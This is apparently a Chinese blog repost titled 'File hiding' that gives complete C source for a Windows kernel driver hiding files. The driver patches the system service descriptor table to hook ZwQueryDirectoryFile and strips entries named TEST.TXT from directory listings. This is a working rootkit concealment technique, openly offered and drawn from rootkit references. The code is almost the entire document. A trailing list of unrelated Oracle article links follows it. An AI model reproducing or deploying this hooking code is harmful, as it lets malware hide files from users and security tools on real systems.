文件隐藏 - 润新知

文件隐藏

/*********************************************************

查找目录/文件操作系统最终调用native api ZwQueryDirectoryFile，

因此拦截此函数可以达到隐藏文件/目录的目的。

*********************************************************/

/*********************************************************

参考

<隐藏任意进程，目录/文件，注册表，端口> sinister whitecell

<再谈Windows NT_2000内部数据结构>       webcrazy

regmon source code                      www.sysinternals.com

*********************************************************/

/*********************************************************

这仅仅是一个简单的例子，

lode 这个驱动前可以在任意目录下建立一个TEST.TXT，

load该驱动后该文件被隐藏

*********************************************************/

#include "ntddk.h"

#include "stdarg.h"

#include "stdio.h"

//----------------------------------------------------------------------

//                           DEFINES

//----------------------------------------------------------------------

#if DBG

#define DbgPrint(arg) DbgPrint arg

#else

#define DbgPrint(arg)

#endif

//

//32768-65535 are reserved for use by customers

//

#define FILE_DEVICE_HIDE      0x00008305

//

//available only on x86 now

//

#define SYSCALL(_function) ServiceTable->ServiceTable[ *(PULONG)((PUCHAR)_fun

ction+1)]

typedef unsigned long       DWORD;

typedef unsigned short      WORD;

typedef int                           BOOL;

//

//structure unopen, parameter into ZwQueryDirectoryFile routine.

//God bless me it will not be changed.ms is shit...

//

typedef struct _FILETIME

{

    DWORD dwLowDateTime;

    DWORD dwHighDateTime;

} FILETIME;

typedef struct _DirEntry

{

    DWORD dwLenToNext;

    DWORD dwAttr;

    FILETIME ftCreate, ftLastAccess, ftLastWrite;

    DWORD dwUnknown[ 2 ];

    DWORD dwFileSizeLow;

    DWORD dwFileSizeHigh;

    DWORD dwUnknown2[ 3 ];

    WORD wNameLen;

    WORD wUnknown;

    DWORD dwUnknown3;

    WORD wShortNameLen;

    WCHAR swShortName[ 12 ];

    WCHAR suName[ 1 ];

} DirEntry, *PDirEntry;

//

// Definition for system call service table

//

typedef struct _SRVTABLE {

        PVOID           *ServiceTable;

        ULONG           LowCall;

        ULONG           HiCall;

        PVOID           *ArgTable;

} SRVTABLE, *PSRVTABLE;

NTSTATUS (*RealZwQueryDirectoryFile)(

    IN HANDLE hFile,

    IN HANDLE hEvent OPTIONAL,

    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,

    IN PVOID IoApcContext OPTIONAL,

    OUT PIO_STATUS_BLOCK pIoStatusBlock,

    OUT PVOID FileInformationBuffer,

    IN ULONG FileInformationBufferLength,

    IN FILE_INFORMATION_CLASS FileInfoClass,

    IN BOOLEAN bReturnOnlyOneEntry,

    IN PUNICODE_STRING PathMask OPTIONAL,

    IN BOOLEAN bRestartQuery);

//----------------------------------------------------------------------

//                         GLOBALS

//----------------------------------------------------------------------

//

// Pointer to system global service table

//

PSRVTABLE               ServiceTable;

extern PSRVTABLE KeServiceDescriptorTable;

PDEVICE_OBJECT          ControlDeviceObject;

//----------------------------------------------------------------------

//                         FORWARD DEFINES

//----------------------------------------------------------------------

NTSTATUS FilehideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp );

VOID     FilehideUnload( IN PDRIVER_OBJECT DriverObject );

NTSYSAPI

NTSTATUS

NTAPI ZwQueryDirectoryFile(

    IN HANDLE FileHandle,

    IN HANDLE Event OPTIONAL,

    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,

    IN PVOID ApcContext OPTIONAL,

    OUT PIO_STATUS_BLOCK IoStatusBlock,

    OUT PVOID FileInformation,

    IN ULONG Length,

    IN FILE_INFORMATION_CLASS FileInformationClass,

    IN BOOLEAN ReturnSingleEntry,

    IN PUNICODE_STRING FileName OPTIONAL,

    IN BOOLEAN RestartScan

    );

//======================================================================

//                    H O O K R O U T I N E S

//======================================================================

//----------------------------------------------------------------------

//

// HookZwQueryDirectoryFile

//

//----------------------------------------------------------------------

NTSTATUS HookZwQueryDirectoryFile(

    IN HANDLE hFile,

    IN HANDLE hEvent OPTIONAL,

    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,

    IN PVOID IoApcContext OPTIONAL,

    OUT PIO_STATUS_BLOCK pIoStatusBlock,

    OUT PVOID FileInformationBuffer,

    IN ULONG FileInformationBufferLength,

    IN FILE_INFORMATION_CLASS FileInfoClass,

    IN BOOLEAN bReturnOnlyOneEntry,

    IN PUNICODE_STRING PathMask OPTIONAL,

    IN BOOLEAN bRestartQuery)

{

    NTSTATUS             rc;

    CHAR                 aProcessName[80];

    ANSI_STRING          ansiFileName,ansiDirName;

    UNICODE_STRING       uniFileName;

    WCHAR                ParentDirectory[1024] = {0};

    int                  BytesReturned;

    PVOID                Object;

        CHAR            aFilehide[] = "TEST.TXT";

    //

    rc = (RealZwQueryDirectoryFile)(

            hFile,

            hEvent,

            IoApcRoutine,

            IoApcContext,

            pIoStatusBlock,

            FileInformationBuffer,

            FileInformationBufferLength,

            FileInfoClass,

            bReturnOnlyOneEntry,

            PathMask,

            bRestartQuery);

    if(NT_SUCCESS(rc))

    {

        PDirEntry p;

        PDirEntry pLast;

        BOOL bLastOne;

        int found;

        p = (PDirEntry)FileInformationBuffer;

        pLast = NULL;

        do

        {

            bLastOne = !( p->dwLenToNext );

            RtlInitUnicodeString(&uniFileName,p->suName);

            RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);

            RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);

            RtlUpperString(&ansiFileName,&ansiDirName);

            found=0;

            DbgPrint(("Filehide: RealZwQueryDirectoryFile %s\n",

ansiFileName.Buffer));

            if( RtlCompareMemory( ansiFileName.Buffer, aFilehide,strlen(aFileh

ide) ) == strlen(aFilehide))

            {

                found=1;

            }

            if(found)

            {

                if(bLastOne)

                {

                    if(p == (PDirEntry)FileInformationBuffer )

                    {

                         rc = 0x80000006;    //hide

                    }

                    else

                        pLast->dwLenToNext = 0;

                    break;

                }

                else

                {

                    int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;

                    int iLeft = (DWORD)FileInformationBufferLength - iPos

-p->dwLenToNext;

                    RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p +

p->dwLenToNext ), (DWORD)iLeft );

                    continue;

                }

            }

            pLast = p;

            p = (PDirEntry)((char *)p + p->dwLenToNext );

        }while( !bLastOne );

        RtlFreeAnsiString(&ansiDirName);

        RtlFreeAnsiString(&ansiFileName);

    }

    return(rc);

}

//----------------------------------------------------------------------

//

// Hook System Call

//

// Replaces entries in the system service table with pointers to

// our own hook routines. We save off the real routine addresses.

//

//----------------------------------------------------------------------

VOID HookSystemCall( void )

{

        //

        // Hook everything

        //

        RealZwQueryDirectoryFile = SYSCALL( ZwQueryDirectoryFile );

        SYSCALL( ZwQueryDirectoryFile ) = (PVOID) HookZwQueryDirectoryFile;

}

//----------------------------------------------------------------------

//

// Unhook System Call

//

//----------------------------------------------------------------------

VOID UnhookSystemCall( )

{

        //

        // Unhook everything

        //

    SYSCALL( ZwQueryDirectoryFile ) = (PVOID) RealZwQueryDirectoryFile;

}

//----------------------------------------------------------------------

//

// FilehideDispatch

//

//----------------------------------------------------------------------

NTSTATUS FilehideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )

{

    PIO_STACK_LOCATION      irpStack;

    //

    // Go ahead and set the request up as successful

    //

    Irp->IoStatus.Status      = STATUS_SUCCESS;

    Irp->IoStatus.Information = 0;

    //

    // Get a pointer to the current location in the Irp. This is where

    //     the function codes and parameters are located.

    //

    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction) {

    case IRP_MJ_CREATE:

        DbgPrint(("Filehide: IRP_MJ_CREATE\n"));

        break;

    case IRP_MJ_SHUTDOWN:

        DbgPrint(("Filehide: IRP_MJ_CREATE\n"));

        break;

    case IRP_MJ_CLOSE:

        DbgPrint(("Filehide: IRP_MJ_CLOSE\n"));

        break;

    case IRP_MJ_DEVICE_CONTROL:

        DbgPrint (("Filehide: IRP_MJ_DEVICE_CONTROL\n"));

        break;

    }

    IoCompleteRequest( Irp, IO_NO_INCREMENT );

    return STATUS_SUCCESS;

}

//----------------------------------------------------------------------

//

// RegmonUnload

//

// Our job is done - time to leave.

//

//----------------------------------------------------------------------

VOID FilehideUnload( IN PDRIVER_OBJECT DriverObject )

{

    WCHAR                   deviceLinkBuffer[] = L"\\DosDevices\\Filehide";

    UNICODE_STRING          deviceLinkUnicodeString;

    DbgPrint(("Filehide.SYS: unloading\n"));

    //

    // Unhook the system call

    //

    UnhookSystemCall();

    //

    // Delete the symbolic link for our device

    //

    RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );

    IoDeleteSymbolicLink( &deviceLinkUnicodeString );

    //

    // Delete the device object

    //

    IoDeleteDevice( DriverObject->DeviceObject );

    DbgPrint(("Filehide.SYS: deleted devices\n"));

}

//----------------------------------------------------------------------

//

// DriverEntry

//

// Installable driver initialization. Here we just set ourselves up.

//

//----------------------------------------------------------------------

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING

RegistryPath )

{

    NTSTATUS                ntStatus;

    WCHAR                   deviceNameBuffer[] = L"\\Device\\Filehide";

    UNICODE_STRING          deviceNameUnicodeString;

    WCHAR                   deviceLinkBuffer[] = L"\\DosDevices\\Filehide";

    UNICODE_STRING          deviceLinkUnicodeString;

    DbgPrint (("Filehide.SYS: entering DriverEntry\n"));

    //

    // Setup our name and symbolic link

    //

    RtlInitUnicodeString (&deviceNameUnicodeString,

                          deviceNameBuffer );

    RtlInitUnicodeString (&deviceLinkUnicodeString,

                          deviceLinkBuffer );

    ntStatus = IoCreateDevice ( DriverObject,

                                0,

                                &deviceNameUnicodeString,

                                FILE_DEVICE_HIDE,

                                0,

                                TRUE,

                                &ControlDeviceObject );

    if (NT_SUCCESS(ntStatus)) {

        //

        // Create a symbolic link that the GUI can specify to gain access

        // to this driver/device

        //

        ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,

                                         &deviceNameUnicodeString );

        //

        // Create dispatch points for all routines that must be handled

        //

        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =

        DriverObject->MajorFunction[IRP_MJ_CREATE]          =

        DriverObject->MajorFunction[IRP_MJ_CLOSE]           =

        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] =

FilehideDispatch;

#if DBG

       DriverObject->DriverUnload                          = FilehideUnload;

#endif

    }

    if (!NT_SUCCESS(ntStatus)) {

        DbgPrint(("Filehide: Failed to create our device!\n"));

        //

        // Something went wrong, so clean up (free resources etc)

        //

        if( ControlDeviceObject ) IoDeleteDevice( ControlDeviceObject );

        IoDeleteSymbolicLink( &deviceLinkUnicodeString );

        return ntStatus;

    }

    //

    // Pointer to system table data structure is an NTOSKRNL export

    //

    ServiceTable = KeServiceDescriptorTable;

    DbgPrint(("Filehide: Servicetable: %x\n", ServiceTable ));

        HookSystemCall();

        DbgPrint(("Filehide: Hook System Call"));

    return STATUS_SUCCESS;

}
相关阅读:
跟我一起来学ORACLE开发系列之三sql语法篇老猫
 浅谈Oracle DBlink搭建老猫
 一个合格的Oracle DBA的速成法摘录老猫
 Oracle数据库设计要做到五戒老猫
 Oracle分析函数参考手册一老猫
 Oracle10G常用维护语句老猫
 数据库设计中的敏捷方法老猫
 oracle数据字典总结老猫
 DBA 1.0与DBA眼中的DBA 2.0时代老猫
 海水的绘制 szlongman
原文地址：https://www.cnblogs.com/sizzle/p/911088.html